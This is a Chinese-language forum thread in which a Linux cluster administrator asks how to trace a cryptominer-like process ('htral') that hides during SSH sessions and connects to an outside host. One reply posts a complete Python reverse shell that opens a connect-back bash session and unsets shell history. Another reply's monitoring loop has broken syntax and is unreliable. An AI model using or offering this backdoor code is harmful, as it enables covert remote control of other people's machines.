linux运维 - linux集群病毒清理
怪我咯
怪我咯 2017-04-17 13:34:36
0
4
384

本人管理者一个不小的linux集群。最近在个别节点上发现了一个名为htral的可疑进程。一直找不到彻底的办法解决,跪求大神支招!!

该进程的行为表现为:

  • 占用400%的CPU资源

  • 一旦有用户ssh登陆到节点,就会在延迟若干秒后自动消失

  • 登陆用户退出后,进程又会自动启动

利用ssh登陆到进程消失的短暂时间,我捕获到了进程的pid和打开的文件资源信息

ls -la /proc/$pid/结果:

lsof $pid输出结果:

现在了解到的情况如下:

  1. 有某一个进程一直在检测当前系统的登陆用户,发现无ssh登陆用户的时候,自动拷贝出文件,/usr/share/htral,执行文件,然后删除文件。

  2. htral进程会连接11.11.3.22节点的50220端口,传递数据。

  3. cat /proc/$pid/stat 看到该进程的父进程pid是1

我在11.11.3.22节点上使用netstat -anp | grep 50220命令检测不到任何输出,lsof -i :50220也没有任何结果(用screen登陆,循环执行一段时间后)。

求助SF上的linux大神们支招,找出这个恶意进程的根源!!!

ps: 我现在把进程的源文件拷贝出来了,但不知道怎么分析。

怪我咯
怪我咯

走同样的路,发现不同的人生

全部回覆(4)
小葫芦

既然你誠心誠意低發問了,我就告訴你吧,不用ssh登錄,也可以想其他辦法取得一個shell啊。

以下免費贈送。

#!/usr/bin/python
import sys
import os
import socket
import pty

shell = "/bin/bash"

def usage(programname):
    print "python connect-back door"
    print "Usage: %s <conn_back_ip> <port>" % programname

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit(1)

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    try:
        s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
        print "[+]Connect OK."
    except:
        print "[-]Can't connect"
        sys.exit(2)

    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    pty.spawn(shell)
    s.close()

if __name__ == "__main__":
    main()
PHPzhong

看下我的方法可不可行:
建個screen
然後
ps aux|grep htral |while read line;do lsof -c htral >> /temp/htral.txt;sleep 300;do lsof -c htral >> /temp/htral.txt;sleep 300. ;done

PHPzhong

放虛擬機器裡,啟動inotify,啟動病毒,記錄創建和修改的文件,通常會修改N個常用管理用命令,用套件管理命令重新安裝這些命令的包。

左手右手慢动作

這是什麼情況

熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板
關於我們 免責聲明 Sitemap
PHP中文網:公益線上PHP培訓,幫助PHP學習者快速成長!